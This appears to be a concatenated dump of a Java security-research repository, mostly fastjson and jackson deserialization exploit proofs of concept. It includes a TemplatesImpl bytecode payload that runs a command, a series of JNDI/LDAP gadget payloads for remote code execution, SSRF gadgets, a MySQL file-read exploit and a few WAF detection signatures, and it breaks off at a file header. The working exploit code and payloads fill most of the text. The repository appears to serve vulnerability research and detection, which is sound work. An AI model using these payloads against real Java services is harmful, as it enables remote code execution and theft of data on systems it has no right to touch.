-------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.rce; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.DOM; 4 | import com.sun.org.apache.xalan.internal.xsltc.TransletException; 5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 6 | import 
com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; 7 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler; 8 | 9 | import java.io.IOException; 10 | 11 | /** 12 | * fastjson反序列化利用class 13 | * 14 | * Created by threedr3am on 2018/5/5. 15 | */ 16 | public class Cmd extends AbstractTranslet{ 17 | 18 | static { 19 | try { 20 | Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator"); 21 | } catch (Throwable e) { 22 | e.printStackTrace(); 23 | } 24 | } 25 | 26 | @Override 27 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { 28 | 29 | } 30 | 31 | @Override 32 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { 33 | 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/CocoonSlidePoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.rce; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | import com.threedr3am.bug.common.server.LdapServer; 6 | 7 | /** 8 | * fastjson <= 1.2.62 RCE,需要开启AutoType (report by threedr3am to ASRC) 9 | * 10 | * PS:因为引用了javax/jms/JMSException类,所以必须在javaee环境下 11 | * 12 | * 13 | * slide 14 | * slide-kernel 15 | * 2.1 16 | * 17 | * 18 | * cocoon 19 | * cocoon-slide 20 | * 2.1.11 21 | * 22 | * 23 | * @author threedr3am 24 | */ 25 | public class CocoonSlidePoc { 26 | static { 27 | //rmi server示例 28 | // RmiServer.run(); 29 | 30 | //ldap server示例 31 | LdapServer.run(); 32 | } 33 | 34 | public static void main(String[] args) { 35 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true); 36 | 37 | String fastjsonPayload = "{\"@type\":\"org.apache.cocoon.components.slide.impl.JMSContentInterceptor\", \"parameters\": 
{\"@type\":\"java.util.Hashtable\",\"java.naming.factory.initial\":\"com.sun.jndi.rmi.registry.RegistryContextFactory\",\"topic-factory\":\"ldap://127.0.0.1:43658/Calc\"}, \"namespace\":\"\"}"; 38 | JSON.parse(fastjsonPayload); 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/CommonsProxyPoc.java: -------------------------------------------------------------------------------- 1 | package com.threedr3am.bug.fastjson.rce; 2 | 3 | import com.alibaba.fastjson.JSON; 4 | import com.alibaba.fastjson.parser.ParserConfig; 5 | import com.threedr3am.bug.common.server.LdapServer; 6 | import com.threedr3am.bug.common.server.RmiServer; 7 | 8 | /** 9 | * fastjson <= 1.2.61 RCE,需要开启AutoType 10 | * 11 | * 12 | * org.apache.commons 13 | * commons-proxy 14 | * 15 | * 16 | * @author threedr3am 17 | */ 18 | public class CommonsProxyPoc { 19 | 20 | static { 21 | //rmi server示例 22 | // RmiServer.run(); 23 | 24 | //ldap server示例 25 | LdapServer.run(); 26 | } 27 | 28 | public static void main(String[] args) { 29 | //TODO 使用rmi server模式时,jdk版本高的需要开启URLCodebase trust 30 | // System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true"); 31 | 32 | ParserConfig.global.setAutoTypeSupport(true); 33 | 34 | // String payload = "{\"@type\":\"org.apache.commons.proxy.provider.remoting.SessionBeanProvider\",\"jndiName\":\"rmi://localhost:43657/Calc\"}"; 35 | String payload = "{\"@type\":\"org.apache.commons.proxy.provider.remoting.SessionBeanProvider\",\"jndiName\":\"ldap://localhost:43658/Calc\",\"Object\":\"a\"}"; 36 | 37 | try { 38 | JSON.parseObject(payload); 39 | } catch (Exception e) { 40 | e.printStackTrace(); 41 | } 42 | 43 | 44 | JSON.parseObject(payload); 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/FastjsonSerialize.java: 
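--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.threedr3am.bug.common.utils.FileToByteArrayUtil;
import java.util.Base64;

/**
 * Exploits fastjson's @type handling: fastjson <= 1.2.24 with Feature.SupportNonPublicField.
 *
 * The payload targets com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl: its private
 * fields _bytecodes/_name/_tfactory are populated from JSON (hence SupportNonPublicField), and
 * "_outputProperties" presumably drives the well-known TemplatesImpl getter chain that defines
 * and instantiates the embedded class (Cmd), whose static initializer runs the command.
 *
 * Change vs. the original: the class bytes are encoded with java.util.Base64 instead of
 * sun.misc.BASE64Encoder. BASE64Encoder is an internal API that is gone in JDK 9+, and it wraps
 * its output with the platform line separator, which the original's replaceAll("\\r\\n", "")
 * only removed on Windows (on LF platforms the newlines stayed inside the JSON string).
 * Base64.getEncoder() emits one unwrapped line everywhere, so the payload is identical where
 * the original already worked and correct where it was not.
 *
 * Created by threedr3am on 2018/5/5.
 */
public class FastjsonSerialize {

    private static final String TEMPLATES_IMPL =
            "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

    public static void main(String[] args) {
        testSimpleExp();
    }

    /**
     * Builds the TemplatesImpl JSON payload around an already base64-encoded class file.
     *
     * @param base64Class standard, unwrapped base64 of the class bytes to embed
     * @return the JSON document fed to fastjson
     */
    public static String buildTemplatesPayload(String base64Class) {
        return "{\"@type\":\"" + TEMPLATES_IMPL + "\","
                + "\"_bytecodes\":[\"" + base64Class + "\"],"
                + "\"_name\":\"a.b\","
                + "\"_tfactory\":{},"
                + "\"_outputProperties\":{}}";
    }

    private static void testSimpleExp() {
        try {
            byte[] classBytes = FileToByteArrayUtil
                    .readCallbackRuntimeClassBytes("com/threedr3am/bug/fastjson/rce/Cmd.class");
            // No line wrapping, so no post-processing of the encoded string is needed.
            String base64Class = Base64.getEncoder().encodeToString(classBytes);
            String exp = buildTemplatesPayload(base64Class);
            System.out.println(exp);
            // Exploitation preconditions: fastjson <= 1.2.24 and Feature.SupportNonPublicField
            // (the targeted TemplatesImpl fields are private).
            JSON.parseObject(exp, Object.class, Feature.SupportNonPublicField);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

}

--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;
import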
com.threedr3am.bug.common.server.RmiServer;

/**
 * fastjson <= 1.2.68 RCE; requires AutoType to be enabled (reported by threedr3am to ASRC).
 *
 * Same HikariConfig gadget as HikariConfigPoc, reached through the copy shaded into
 * hadoop-client-minicluster. Presumably the relocated package name is what keeps it off
 * fastjson's denylist for this version — verify against that release's hash list.
 *
 * Dependency: org.apache.hadoop : hadoop-client-minicluster : 3.2.1
 *
 * @author threedr3am
 */
public class HadoopHikariPoc {
    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        // RMI variant (metricRegistry setter):
        // String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
        // LDAP variant (healthCheckRegistry setter)
        final String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
        JSON.parse(payload);
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HikariConfigPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;

/**
 * fastjson <= 1.2.59 RCE; requires AutoType to be enabled.
 *
 * Dependency: com.zaxxer : HikariCP
 *
 * @author threedr3am
 */
public class HikariConfigPoc {

    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) {
        // TODO when using the RMI server mode, newer JDKs need URL codebase trust enabled:
        // System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");

        ParserConfig.global.setAutoTypeSupport(true);

        // RMI variants (metricRegistry / healthCheckRegistry setters):
        // String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
        // String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"rmi://localhost:43657/Calc\"}";

        // LDAP variants. Only payload is parsed; payload2 is kept as the alternative
        // setter and is never used here.
        final String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
        final String payload2 = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
        JSON.parse(payload);
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/IbatisSqlmapPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;

/**
 * fastjson <= 1.2.62 RCE; requires AutoType to be enabled
 * (reported by threedr3am to Alibaba Cloud Xianzhi crowd-testing; already known internally).
 *
 * Dependencies:
 *   org.apache.ibatis : ibatis-sqlmap : 2.3.4.726
 *   javax : javaee-api : 8.0.1
 *
 * @author threedr3am
 */
public class IbatisSqlmapPoc {
    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        // LDAP variant: "properties" is typed as java.util.Properties and carries, under the
        // "UserTransaction" key, the name JtaTransactionConfig presumably looks up via JNDI.
        final String payload = "{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"ldap://localhost:43658/Calc\"}}";
        JSON.parse(payload);
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/IgniteJtaPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * TODO (original note): a new fastjson attack surface — the "$ref" feature can trigger most
 * getters of the object being deserialized, which in theory allows RCE through a dangerous
 * getter even when AutoType is disabled.
 *
 * fastjson <= 1.2.67
 *
 * Dependency: org.apache.ignite : ignite-jta : 2.8.0
 *
 * @author threedr3am
 */
public class IgniteJtaPoc {

    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) throws IOException {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        // jndiNames carries the attacker URL; "tm": {"$ref":"$.tm"} resolves the reference by
        // invoking the "tm" getter on the same object (per the note above), which is
        // presumably where the JNDI lookup happens.
        final String json = "{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\", \"jndiNames\":[\"ldap://localhost:43658/Calc\"], \"tm\": {\"$ref\":\"$.tm\"}}";
        JSON.parse(json);
    }

}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/JndiConverterPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;

/**
 * fastjson <= 1.2.62 RCE; requires AutoType to be enabled (reported by threedr3am to ASRC).
 *
 * The jackson-databind CVE-2020-8840 gadget works unchanged with fastjson.
 *
 * Gadget provided by xbean-reflect: org.apache.xbean : xbean-reflect
 *
 * @author threedr3am
 */
public class JndiConverterPoc {
    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        // LDAP variant: "asText" is the JndiConverter property that receives the JNDI name.
        final String payload = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"ldap://localhost:43658/Calc\"}";
        JSON.parse(payload);
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/NoNeedAutoTypePoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.threedr3am.bug.common.server.LdapServer;
import com.threedr3am.bug.common.server.RmiServer;

/**
 * fastjson below 1.2.48: no configuration required — RCE against the default settings.
 *
 * @author threedr3am
 */
public class NoNeedAutoTypePoc {

    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) {
        // TODO when using the RMI server mode, newer JDKs need URL codebase trust enabled:
        // System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");

        /*
         * TODO (original note) Two-step payload. The first array element deserializes a
         * java.lang.Class whose "val" is com.sun.rowset.JdbcRowSetImpl, which loads that class
         * into fastjson's class cache. checkAutoType consults the cache first and returns
         * immediately on a hit — only on a miss does it hash the name against the denylist —
         * so the second element's @type passes both the denylist and the AutoType check.
         * Setting "autoCommit" presumably forces JdbcRowSetImpl to connect, which resolves
         * "dataSourceName" through JNDI.
         */
        // RMI variant:
        // String payload = "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43657/Calc\",\"autoCommit\":true}]";
        // LDAP variant
        final String payload = "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658/Calc\",\"autoCommit\":true}]";
        JSON.parse(payload);
        // Hence the payload has to be delivered as these two steps within one document.
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/QuercusPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;
import org.springframework.security.web.savedrequest.DefaultSavedRequest; // unused in this PoC

/**
 * TODO (original note): a new fastjson attack surface — the "$ref" feature can trigger most
 * getters of the object being deserialized, which in theory allows RCE through a dangerous
 * getter even when AutoType is disabled.
 *
 * fastjson <= 1.2.68 RCE; requires AutoType to be enabled.
 *
 * quercus ResourceRef JNDI gadget: com.caucho : quercus : 4.0.63
 *
 * @author threedr3am
 */
public class QuercusPoc {
    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        // LDAP variant: "lookupName" is the JNDI name; "value": {"$ref":"$.value"} forces the
        // "value" getter to run (per the $ref note above), presumably performing the lookup.
        final String payload = "{\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\", \"value\": {\"$ref\":\"$.value\"}}";
        JSON.parse(payload);
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/ShiroPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;

/**
 * fastjson <= 1.2.66 RCE; requires AutoType to be enabled.
 *
 * shiro-core gadget: org.apache.shiro : shiro-core
 *
 * @author threedr3am
 */
public class ShiroPoc {
    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP
// server example (LDAP)
        LdapServer.run();
    }

    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        // LDAP variant: "jndiNames" holds the attacker URL; the single empty "Realms" entry is
        // presumably what makes JndiRealmFactory resolve the names.
        final String payload = "{\"@type\":\"org.apache.shiro.realm.jndi.JndiRealmFactory\", \"jndiNames\":[\"ldap://localhost:43658/Calc\"], \"Realms\":[\"\"]}";
        JSON.parse(payload);
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/ShiroPoc2.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.rce;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;
import java.io.IOException;

/**
 * TODO (original note): a new fastjson attack surface — the "$ref" feature can trigger most
 * getters of the object being deserialized, which in theory allows RCE through a dangerous
 * getter even when AutoType is disabled.
 *
 * fastjson <= 1.2.67
 *
 * @author threedr3am
 */
public class ShiroPoc2 {
    static {
        // RMI server example:
        // RmiServer.run();

        // LDAP server example
        LdapServer.run();
    }

    public static void main(String[] args) throws IOException {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

        // "resourceName" is the JNDI name; "instance": {"$ref":"$.instance"} forces the
        // "instance" getter to run (per the note above), presumably performing the lookup.
        final String json = "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\":\"ldap://localhost:43658/Calc\",\"instance\":{\"$ref\":\"$.instance\"}}";
        JSON.parse(json);

    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/ApacheCxfSSRFPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.ssrf;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.HTTPServer;

/**
* fastjson <= 1.2.66, SSRF; requires AutoType to be enabled (discovered by threedr3am;
 * low impact). The original header said "RCE", but this class sits in the ssrf package and
 * only makes the target fetch the attacker-supplied "schemaLocations" URL: the HTTPServer
 * started below is what observes the callback, and no JNDI/LDAP server is involved.
 *
 * Dependencies:
 *   org.apache.cxf : cxf-core : 3.3.5
 *   org.apache.cxf : cxf-bundle : 2.7.18
 *
 * @author threedr3am
 */
public class ApacheCxfSSRFPoc {

    static {
        // Local listener that receives the outbound request triggered by the gadget.
        HTTPServer.PORT = 23234;
        HTTPServer.run(null);
    }

    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        // WadlGenerator presumably tries to load the schema from this URL when the property is set.
        final String payload = "{\"@type\":\"org.apache.cxf.jaxrs.model.wadl.WadlGenerator\",\"schemaLocations\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
        try {
            JSON.parse(payload);
        } catch (Exception e) {
            // The request is the observable; whatever fails afterwards is just printed.
            e.printStackTrace();
        }
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/ApacheCxfSSRFPoc2.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.ssrf;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.HTTPServer;

/**
 * fastjson <= 1.2.66, SSRF; requires AutoType to be enabled (discovered by threedr3am;
 * low impact). As with ApacheCxfSSRFPoc, the original header said "RCE", but the gadget only
 * causes an outbound HTTP request to the attacker-supplied "schemaLocations" URL.
 *
 * Dependencies:
 *   org.apache.cxf : cxf-core : 3.3.5
 *   org.apache.cxf : cxf-bundle : 2.7.18
 *
 * @author threedr3am
 */
public class ApacheCxfSSRFPoc2 {

    static {
        // Local listener that receives the outbound request triggered by the gadget.
        HTTPServer.PORT = 23234;
        HTTPServer.run(null);
    }

    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        // SchemaHandler variant of the same property.
        final String payload = "{\"@type\":\"org.apache.cxf.jaxrs.utils.schemas.SchemaHandler\",\"schemaLocations\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
        try {
            JSON.parse(payload);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/CommonsJellySSRFPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.ssrf;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.HTTPServer;

/**
 * fastjson <= 1.2.66, SSRF; requires AutoType to be enabled (discovered by threedr3am;
 * low impact). The original header said "RCE", but the gadget only makes the target issue an
 * HTTP request for the attacker-supplied "script" URL — the HTTPServer below sees it.
 *
 * Dependency: commons-jelly : commons-jelly : 1.0.1
 *
 * @author threedr3am
 */
public class CommonsJellySSRFPoc {

    static {
        // Local listener that receives the outbound request triggered by the gadget.
        HTTPServer.PORT = 23234;
        HTTPServer.run(null);
    }

    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        // Embedded's "script" property presumably fetches the URL it is given.
        final String payload = "{\"@type\":\"org.apache.commons.jelly.impl.Embedded\",\"script\": \"http://127.0.0.1:23234?aaaa=111&bb=242\"}";
        try {
            JSON.parse(payload);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/JREJeditorPaneSSRFPoc.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.fastjson.ssrf;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.HTTPServer;

/**
 * fastjson <= 1.2.68, SSRF; requires AutoType to be enabled (discovered by threedr3am).
 * TODO (original note): this gadget needs only the JRE — javax.swing.JEditorPane.setPage(String)
 * loads the given URL — so no third-party dependency is required, which makes it a fairly
 * good gadget. The original header said "RCE"; the observable effect is the outbound request.
 *
 * @author threedr3am
 */
public class JREJeditorPaneSSRFPoc {

    static {
        // Local listener that receives the outbound request triggered by the gadget.
        HTTPServer.PORT = 23234;
        HTTPServer.run(null);
    }

    public static void main(String[] args) {
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
        final String payload =
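"{\"@type\":\"javax.swing.JEditorPane\",\"page\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
        try {
            JSON.parse(payload);
        } catch (Exception e) {
            // The request is the observable; whatever fails afterwards is just printed.
            e.printStackTrace();
        }
    }
}
--------------------------------------------------------------------------------
/feature/src/main/java/com/threedr3am/bug/feature/CAS4$1And4$2.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.feature;

/**
 * Placeholder for the deserialization-attack signatures of CAS 4.1.x-4.1.6 and 4.1.7-4.2.x.
 * No detection logic is implemented here yet.
 *
 * @author threedr3am
 */
public class CAS4$1And4$2 {

}
--------------------------------------------------------------------------------
/feature/src/main/java/com/threedr3am/bug/feature/JavaClassByteCode.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.feature;

import java.io.IOException;
import java.io.InputStream;

/**
 * Java class-file signature: every class file starts with the magic number 0xCAFEBABE, which is
 * the byte pattern a WAF can key on to spot raw bytecode (e.g. a TemplatesImpl "_bytecodes"
 * payload, which carries it base64-encoded) in a request body.
 *
 * Fixes vs. the original: the stream was read with a single read() into a buffer sized by
 * available(), which is only an estimate and may be smaller than the stream (a short read
 * would silently truncate the dump and could miss the signature), and the stream was never
 * closed. The stream is now drained to EOF and closed with try-with-resources; a missing
 * resource fails with an IOException instead of a NullPointerException.
 *
 * @author threedr3am
 */
public class JavaClassByteCode {

    /** The magic number in the "\xca\xfe\xba\xbe" textual form produced by testClass. */
    static final String MAGIC_HEX = "\\xca\\xfe\\xba\\xbe";

    public static void main(String[] args) throws IOException {
        // "String.class" is resolved relative to Object's package, i.e. java/lang/String.class.
        testClass(Object.class.getResourceAsStream("String.class"));
        testClass(JavaClassByteCode.class.getResourceAsStream("JavaClassByteCode.class"));
    }

    /**
     * Returns true when {@code bytes} starts with the class-file magic 0xCAFEBABE.
     *
     * @param bytes raw bytes; null or fewer than four bytes yields false
     * @return whether the magic number is present at offset 0
     */
    public static boolean isClassFile(byte[] bytes) {
        return bytes != null
                && bytes.length >= 4
                && bytes[0] == (byte) 0xCA
                && bytes[1] == (byte) 0xFE
                && bytes[2] == (byte) 0xBA
                && bytes[3] == (byte) 0xBE;
    }

    /**
     * Dumps the whole stream as "\xNN " tokens and reports whether the magic is present.
     *
     * @param inputStream class bytes; fully consumed and closed on return
     * @throws IOException if the stream is null or cannot be read
     */
    private static void testClass(InputStream inputStream) throws IOException {
        byte[] bytes = readFully(inputStream);
        StringBuilder stringBuilder = new StringBuilder(bytes.length * 5);
        for (byte b : bytes) {
            // Formatter treats a negative Byte as unsigned for %x, so 0xCA prints as "ca".
            stringBuilder.append(String.format("\\x%x ", b));
        }
        printAndMatch(stringBuilder.toString());
    }

    /**
     * Reads the stream to EOF and closes it.
     *
     * @param inputStream stream to drain; must not be null
     * @return all bytes of the stream
     * @throws IOException if the stream is null or reading fails
     */
    private static byte[] readFully(InputStream inputStream) throws IOException {
        if (inputStream == null) {
            throw new IOException("resource not found");
        }
        java.io.ByteArrayOutputStream out = new java.io.ByteArrayOutputStream();
        byte[] buf = new byte[8192];
        try (InputStream in = inputStream) {
            int n;
            while ((n = in.read(buf)) != -1) {
                out.write(buf, 0, n);
            }
        }
        return out.toByteArray();
    }

    /** Prints the dump, then whether the (space-stripped) dump contains the magic number. */
    private static void printAndMatch(String bytes) {
        System.out.println(bytes);
        // Plain substring test on the hex dump; spaces are dropped first so tokens run together.
        System.out.println(bytes.replaceAll(" ", "").contains(MAGIC_HEX));
    }
}
--------------------------------------------------------------------------------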
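/feature/src/main/java/com/threedr3am/bug/feature/JolokiaAttackUrlFeature.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.feature;

import java.util.regex.Pattern;

/**
 * Signature for the Spring Boot actuator + Jolokia attack: a /jolokia/exec/ request that asks
 * logback's JMXConfigurator to reloadByURL from an attacker-controlled URL (the "!/" in the
 * example is Jolokia's escaping of "/" inside a path argument).
 *
 * Changes vs. the original: the Pattern is compiled once as a constant instead of on every
 * call, and the check is exposed as {@link #matches(String)} so a WAF rule can call it and it
 * can be unit-tested; main() still prints the example URL and the match result.
 *
 * NOTE(review): this is a literal substring match on the raw URL. A percent-encoded or
 * otherwise un-normalized path (e.g. "%2Fjolokia%2Fexec%2F") is not caught; decode and
 * normalize the path before applying this signature — confirm what form the WAF layer sees.
 *
 * @author threedr3am
 */
public class JolokiaAttackUrlFeature {

    static String exampleURL = "http://localhost:8080/" + "jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/" + "http:!/!/127.0.0.1:8888!/logback-evil.xml";

    /** Compiled once; Pattern is immutable and safe to share across threads. */
    private static final Pattern JOLOKIA_EXEC = Pattern.compile("/jolokia/exec/");

    /**
     * Tests a request URL (or path) against the signature.
     *
     * @param url URL or path to test; null yields false
     * @return true when the text contains the "/jolokia/exec/" segment
     */
    public static boolean matches(String url) {
        return url != null && JOLOKIA_EXEC.matcher(url).find();
    }

    public static void main(String[] args) {
        System.out.println(exampleURL);
        System.out.println(matches(exampleURL));
    }
}
--------------------------------------------------------------------------------
/feature/src/main/java/com/threedr3am/bug/feature/package-info.java:
--------------------------------------------------------------------------------
/**
 * Data signatures of several Java attacks and the corresponding detection checks (intended
 * for WAF use).
 *
 * @author threedr3am
 */
package com.threedr3am.bug.feature;
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/MysqlFileRead.java:
--------------------------------------------------------------------------------
package com.threedr3am.bug.jackson;

import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;

/**
 * CVE-2019-12086
 * jackson-databind file read: 2.x up to 2.9.9, with mysql < 8.0.14 (versions as noted in the
 * original).
 * https://github.com/Gifts/Rogue-MySql-Server
 *
 * @author threedr3am
 */
public class MysqlFileRead {

    public static void main(String[] args) throws IOException {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        // Point the JDBC URL at a Rogue-MySql-Server instance; the rogue server is what
        // presumably reads files from the connecting client.
        final String json = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://127.0.0.1:3306/\"]";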
mapper.readValue(json, Object.class);
    }
}
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/package-info.java:
--------------------------------------------------------------------------------
/**
 * Index of the jackson-databind PoCs in this package, by CVE:
 *
 * CVE-2020-8840  com.threedr3am.bug.jackson.rce.JndiConverterPoc
 * CVE-2019-20330 com.threedr3am.bug.jackson.EhcacheJndi2
 * CVE-2019-14379 com.threedr3am.bug.jackson.rce.EhcacheJndi
 * CVE-2019-12384 com.threedr3am.bug.jackson.rce.H2Rce
 * CVE-2019-12086 com.threedr3am.bug.jackson.MysqlFileRead
 *
 * @author threedr3am
 */
package com.threedr3am.bug.jackson;
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/AnterosPoc.java:
